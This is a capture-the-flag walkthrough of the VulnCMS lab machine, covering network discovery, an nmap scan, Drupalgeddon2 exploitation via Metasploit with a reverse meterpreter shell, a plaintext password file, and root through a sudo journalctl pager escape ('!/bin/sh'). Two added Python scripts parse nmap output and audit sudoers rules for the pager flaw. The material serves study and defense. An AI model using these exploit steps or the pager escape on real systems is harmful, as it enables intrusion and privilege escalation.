
Notes on working through the VulnCMS target machine

Information gathering

Host discovery

Use arp-scan for host discovery to find the target's IP address on the local network segment.

sudo arp-scan 192.168.109.0/24
[sudo] password for kali:
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d6:59:a7, IPv4: 192.168.109.140
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.109.1 00:50:56:c0:00:08 VMware, Inc.
192.168.109.2 00:50:56:f0:a1:15 VMware, Inc.
192.168.109.145 00:0c:29:da:98:92 VMware, Inc.
192.168.109.254 00:50:56:f8:89:68 VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.938 seconds (132.09 hosts/sec). 4 responded

The scan shows the target's IP address is 192.168.109.145; next, run a port scan against it with nmap.

Port scanning

sudo nmap -sC -sV -p- 192.168.109.145
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-27 12:43 EDT
Nmap scan report for 192.168.109.145
Host is up (0.0014s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8c:9f:7e:78:82:ef:76:f6:26:23:c9:52:6d:aa:fe:d0 (RSA)
| 256 2a:e2:f6:d2:52:1c:c1:d0:3d:aa:40:e6:b5:08:1d:45 (ECDSA)
|_ 256 fa:c9:eb:58:e3:d2:b7:4a:74:77:fc:69:0e:b6:68:08 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: W3.CSS Template
5000/tcp open http nginx 1.14.0 (Ubuntu)
|_http-generator: WordPress 5.7.2
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: fsociety – Just another WordPress site
8081/tcp open http nginx 1.14.0 (Ubuntu)
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Home
9001/tcp open http nginx 1.14.0 (Ubuntu)
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: fsociety.web
MAC Address: 00:0C:29:DA:98:92 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.84 seconds

The nmap scan shows ports 22 (ssh), 80 (http), 5000 (http), 8081 (http) and 9001 (http) open.
Apart from 22 (ssh), every other service on this box is HTTP. A vulnerability-database search for OpenSSH 7.6 turned up a username enumeration issue, but it is of little use here since a password would still be needed. Going through the pages of the other HTTP services (mainly with directory scanning) yielded nothing usable.
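The nmap output above is worth more than a list of open ports: the http-generator script lines identify three separate CMS products (WordPress, Joomla! and Drupal 7) behind the same nginx, each of which is patched independently. The following script, added here as an example and not part of the original write-up, parses nmap's normal output into port records and pulls out a per-port CMS inventory that a defender can diff against a patch list. The sample input is a constructed excerpt of the scan shown above; the function names are my own.

```python
import re

# Constructed sample input: an excerpt of the nmap output shown above.
SAMPLE_NMAP = """\
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: W3.CSS Template
5000/tcp open http nginx 1.14.0 (Ubuntu)
|_http-generator: WordPress 5.7.2
|_http-title: fsociety – Just another WordPress site
8081/tcp open http nginx 1.14.0 (Ubuntu)
|_http-generator: Joomla! - Open Source Content Management
9001/tcp open http nginx 1.14.0 (Ubuntu)
|_http-generator: Drupal 7 (http://drupal.org)
|_http-title: fsociety.web
"""

# "22/tcp open ssh OpenSSH 7.6p1 ..." -> port, proto, state, service, free-text version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# "|_http-generator: WordPress 5.7.2" -> NSE script name, value (continuation lines are skipped)
SCRIPT_RE = re.compile(r"^\|_?\s*([\w-]+):\s*(.*)$")


def parse_nmap(text):
    """Turn nmap normal output into a list of port records with their script results."""
    records = []
    current = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {
                "port": int(m.group(1)),
                "proto": m.group(2),
                "state": m.group(3),
                "service": m.group(4),
                "version": m.group(5).strip(),
                "scripts": {},
            }
            records.append(current)
            continue
        m = SCRIPT_RE.match(line)
        if m and current is not None:
            # Attach the script result to the most recent port line.
            current["scripts"][m.group(1)] = m.group(2).strip()
    return records


def open_ports(records):
    """Sorted list of open port numbers."""
    return sorted(r["port"] for r in records if r["state"] == "open")


def cms_inventory(records):
    """Map port -> CMS string reported by the http-generator script."""
    return {
        r["port"]: r["scripts"]["http-generator"]
        for r in records
        if "http-generator" in r["scripts"]
    }


if __name__ == "__main__":
    recs = parse_nmap(SAMPLE_NMAP)
    print("open ports:", open_ports(recs))
    for port, cms in sorted(cms_inventory(recs).items()):
        # Each entry is a separately maintained product that needs its own patch cadence.
        print(f"port {port}: {cms}")
```

Feeding the full `nmap -sC -sV -p-` output of a host into `parse_nmap` gives the same inventory for any number of ports; the `http-generator` value is only as reliable as the meta tag the site serves, so treat it as a lead to confirm, not as a version of record.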

The nmap output, however, shows Drupal 7 running on port 9001. From earlier practice boxes I knew there is a public exploit for it, so the msfconsole framework can be used to search for and load the relevant module. One snag: I initially picked the wrong module and never got a shell back; after checking articles online, the module to use is exploit/unix/webapp/drupal_drupalgeddon2.

Exploitation

msfconsole 

`:oDFo:`
./ymM0dayMmy/.
-+dHJ5aGFyZGVyIQ==+-
`:sm⏣~~Destroy.No.Data~~s:`
-+h2~~Maintain.No.Persistence~~h+-
`:odNo2~~Above.All.Else.Do.No.Harm~~Ndo:`
./etc/shadow.0days-Data'%20OR%201=1--.No.0MN8'/.
-++SecKCoin++e.AMd` `.-://///+hbove.913.ElsMNh+-
-~/.ssh/id_rsa.Des- `htN01UserWroteMe!-
:dopeAW.No<nano>o :is:TЯiKC.sudo-.A:
:we're.all.alike'` The.PFYroy.No.D7:
:PLACEDRINKHERE!: yxp_cmdshell.Ab0:
:msf>exploit -j. :Ns.BOB&ALICEes7:
:---srwxrwx:-.` `MS146.52.No.Per:
:<script>.Ac816/ sENbove3101.404:
:NT_AUTHORITY.Do `T:/shSYSTEM-.N:
:09.14.2011.raid /STFU|wall.No.Pr:
:hevnsntSurb025N. dNVRGOING2GIVUUP:
:#OUTHOUSE- -s: /corykennedyData:
:$nmap -oS SSo.6178306Ence:
:Awsm.da: /shMTl#beats3o.No.:
:Ring0: `dDestRoyREXKC3ta/M:
:23d: sSETEC.ASTRONOMYist:
/- /yo- .ence.N:(){ :|: & };:
`:Shall.We.Play.A.Game?tron/
```-ooy.if1ghtf0r+ehUser5`
..th3.H1V3.U2VjRFNN.jMh+.`
`MjM~~WE.ARE.se~~MMjMs
+~KANSAS.CITY's~-`
J~HAKCERS~./.`
.esc:wq!:`
+++ATH`
`


=[ metasploit v6.0.30-dev ]
+ -- --=[ 2099 exploits - 1129 auxiliary - 357 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]

Metasploit tip: When in a module, use back to go
back to the top level prompt

msf6 > search Drupal

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
1 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
3 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
4 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
5 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
6 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE
7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution


Interact with a module by name or index. For example info 7, use 7 or use exploit/unix/webapp/php_xmlrpc_eval

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.109.145
rhosts => 192.168.109.145
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rport 9001
rport => 9001
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit

[*] Started reverse TCP handler on 192.168.109.140:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Sending stage (39282 bytes) to 192.168.109.145
[*] Meterpreter session 1 opened (192.168.109.140:4444 -> 192.168.109.145:45078) at 2021-07-27 13:18:40 -0400

Exploitation succeeded. The file holding the username and password (tyrell.pass) is in the misc directory. I had to look this up online as well; I clearly was not careful enough when going through the files...

Reading the password file

cat tyrell.pass
Username: tyrell
Password: mR_R0bo7_i5_R3@!_

With the username and password, connect over ssh.
After connecting, privilege escalation is needed; here again sudo is used to escalate.

Privilege escalation

sudo -l
Matching Defaults entries for tyrell on vuln_cms:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User tyrell may run the following commands on vuln_cms:
(root) NOPASSWD: /bin/journalctl

This shows that journalctl can be run as root without a password.

sudo journalctl 
-- Logs begin at Fri 2021-05-28 12:16:41 UTC, end at Tue 2021-07-27 17:31:18 UTC. --
May 28 12:16:41 vuln_cms kernel: Linux version 4.15.0-143-generic (buildd@lcy01-amd64-001) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #147-Ubuntu SMP Wed Apr 14 16:10:11 UT
May 28 12:16:41 vuln_cms kernel: Command line: BOOT_IMAGE=/vmlinuz-4.15.0-143-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro maybe-ubiquity
May 28 12:16:41 vuln_cms kernel: KERNEL supported cpus:
May 28 12:16:41 vuln_cms kernel: Intel GenuineIntel
May 28 12:16:41 vuln_cms kernel: AMD AuthenticAMD
May 28 12:16:41 vuln_cms kernel: Centaur CentaurHauls
May 28 12:16:41 vuln_cms kernel: [Firmware Bug]: TSC doesn't count with P0 frequency!
May 28 12:16:41 vuln_cms kernel: x86/fpu: Supporting XSAVE feature 0x001: 'x87 floating point registers'
May 28 12:16:41 vuln_cms kernel: x86/fpu: Supporting XSAVE feature 0x002: 'SSE registers'
May 28 12:16:41 vuln_cms kernel: x86/fpu: Supporting XSAVE feature 0x004: 'AVX registers'
May 28 12:16:41 vuln_cms kernel: x86/fpu: xstate_offset[2]: 576, xstate_sizes[2]: 256
May 28 12:16:41 vuln_cms kernel: x86/fpu: Enabled xstate features 0x7, context size is 832 bytes, using 'standard' format.
May 28 12:16:41 vuln_cms kernel: e820: BIOS-provided physical RAM map:
May 28 12:16:41 vuln_cms kernel: BIOS-e820: [mem 0x0000000000000000-0x000000000009fbff] usable
May 28 12:16:41 vuln_cms kernel: BIOS-e820: [mem 0x000000000009fc00-0x000000000009ffff] reserved
May 28 12:16:41 vuln_cms kernel: BIOS-e820: [mem 0x00000000000f0000-0x00000000000fffff] reserved
May 28 12:16:41 vuln_cms kernel: BIOS-e820: [mem 0x0000000000100000-0x000000007ffeffff] usable
May 28 12:16:41 vuln_cms kernel: BIOS-e820: [mem 0x000000007fff0000-0x000000007fffffff] ACPI data
May 28 12:16:41 vuln_cms kernel: BIOS-e820: [mem 0x00000000fec00000-0x00000000fec00fff] reserved
May 28 12:16:41 vuln_cms kernel: BIOS-e820: [mem 0x00000000fee00000-0x00000000fee00fff] reserved
May 28 12:16:41 vuln_cms kernel: BIOS-e820: [mem 0x00000000fffc0000-0x00000000ffffffff] reserved
May 28 12:16:41 vuln_cms kernel: NX (Execute Disable) protection: active
May 28 12:16:41 vuln_cms kernel: SMBIOS 2.5 present.
May 28 12:16:41 vuln_cms kernel: DMI: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBox 12/01/2006
May 28 12:16:41 vuln_cms kernel: Hypervisor detected: KVM
May 28 12:16:41 vuln_cms kernel: e820: update [mem 0x00000000-0x00000fff] usable ==> reserved
May 28 12:16:41 vuln_cms kernel: e820: remove [mem 0x000a0000-0x000fffff] usable
May 28 12:16:41 vuln_cms kernel: e820: last_pfn = 0x7fff0 max_arch_pfn = 0x400000000
May 28 12:16:41 vuln_cms kernel: MTRR default type: uncachable
May 28 12:16:41 vuln_cms kernel: MTRR variable ranges disabled:
May 28 12:16:41 vuln_cms kernel: MTRR: Disabled
May 28 12:16:41 vuln_cms kernel: x86/PAT: MTRRs disabled, skipping PAT initialization too.
May 28 12:16:41 vuln_cms kernel: CPU MTRRs all blank - virtualized system.
May 28 12:16:41 vuln_cms kernel: x86/PAT: Configuration [0-7]: WB WT UC- UC WB WT UC- UC
May 28 12:16:41 vuln_cms kernel: found SMP MP-table at [mem 0x0009fff0-0x0009ffff]
May 28 12:16:41 vuln_cms kernel: Scanning 1 areas for low memory corruption
May 28 12:16:41 vuln_cms kernel: RAMDISK: [mem 0x30ec5000-0x34759fff]
May 28 12:16:41 vuln_cms kernel: ACPI: Early table checksum verification disabled
May 28 12:16:41 vuln_cms kernel: ACPI: RSDP 0x00000000000E0000 000024 (v02 VBOX )
May 28 12:16:41 vuln_cms kernel: ACPI: XSDT 0x000000007FFF0030 00003C (v01 VBOX VBOXXSDT 00000001 ASL 00000061)
May 28 12:16:41 vuln_cms kernel: ACPI: FACP 0x000000007FFF00F0 0000F4 (v04 VBOX VBOXFACP 00000001 ASL 00000061)
May 28 12:16:41 vuln_cms kernel: ACPI: DSDT 0x000000007FFF0470 002325 (v02 VBOX VBOXBIOS 00000002 INTL 20100528)
May 28 12:16:41 vuln_cms kernel: ACPI: FACS 0x000000007FFF0200 000040
May 28 12:16:41 vuln_cms kernel: ACPI: FACS 0x000000007FFF0200 000040
!/bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)

Once the program is running it hands its output to a pager (less) that is itself running as root; typing !/bin/sh at the pager prompt makes the pager spawn a shell, and that shell is root.
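The root cause in the sudo -l output above is the rule itself: granting a pager-capable command with no argument list lets the caller run it on a terminal and inherit the pager as the run-as user. The script below, added here as an example and not part of the original write-up, parses one-line sudoers rules, flags this pattern, and shows the corrected rule beside the weak one. The two rules are constructed from the sudo -l output on this page; the set of pager-capable commands and the function names are my own assumptions.

```python
import re
import shlex

# Constructed sudoers rules: the weak rule matching the sudo -l output above, and a
# corrected rule that pins the argument list so journalctl never starts a pager.
WEAK_RULE = "tyrell ALL=(root) NOPASSWD: /bin/journalctl"
FIXED_RULE = "tyrell ALL=(root) NOPASSWD: /bin/journalctl --no-pager"

# Commands known to hand their output to an interactive pager on a terminal.
# journalctl is the one on this page; extending the set is a local decision (assumption).
PAGER_COMMANDS = {"/bin/journalctl", "/usr/bin/journalctl"}

# user host=(runas) [TAG:]* command[, command]  -- the common one-line sudoers shape
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)


def parse_rule(line):
    """Split one sudoers rule into user, host, run-as user, tags and command list."""
    m = RULE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised sudoers rule: {line!r}")
    tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
    cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
    return {
        "user": m.group("user"),
        "host": m.group("host"),
        "runas": m.group("runas") or "root",  # sudo's default run-as user
        "tags": tags,
        "commands": cmds,
    }


def audit_rule(line):
    """Return (finding, command) pairs for one rule; an empty list means nothing flagged."""
    rule = parse_rule(line)
    findings = []
    for cmd in rule["commands"]:
        argv = shlex.split(cmd)
        path, args = argv[0], argv[1:]
        if path == "ALL":
            findings.append(("unrestricted-command", cmd))
            continue
        # Without an argument list the caller chooses the arguments, and a pager-capable
        # command run on a terminal then drops into a pager executing as the run-as user.
        # sudo matches the full argument list, so pinning "--no-pager" in the rule closes it.
        if path in PAGER_COMMANDS and "--no-pager" not in args:
            findings.append(("pager-as-" + rule["runas"], cmd))
    if "NOPASSWD" in rule["tags"]:
        findings = [(kind + ",nopasswd", cmd) for kind, cmd in findings]
    return findings


if __name__ == "__main__":
    for label, rule in (("weak ", WEAK_RULE), ("fixed", FIXED_RULE)):
        print(label, rule, "->", audit_rule(rule) or "ok")
```

Run it over the output of `sudo -l` after rewriting each "(root) NOPASSWD: cmd" line into the sudoers shape, or directly over /etc/sudoers.d/* fragments. The cleaner fix where only log reading is needed is to drop the sudo rule entirely and add the user to the systemd-journal group, which grants journal read access without any root execution.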
Reading the flags

# cd /home/     
# ls
elliot ghost tyrell
# cd elliot
# cat user.txt
9046628504775551
# cd /root/
# ls
root.txt
# cat root.txt
4359537020406305
#

done
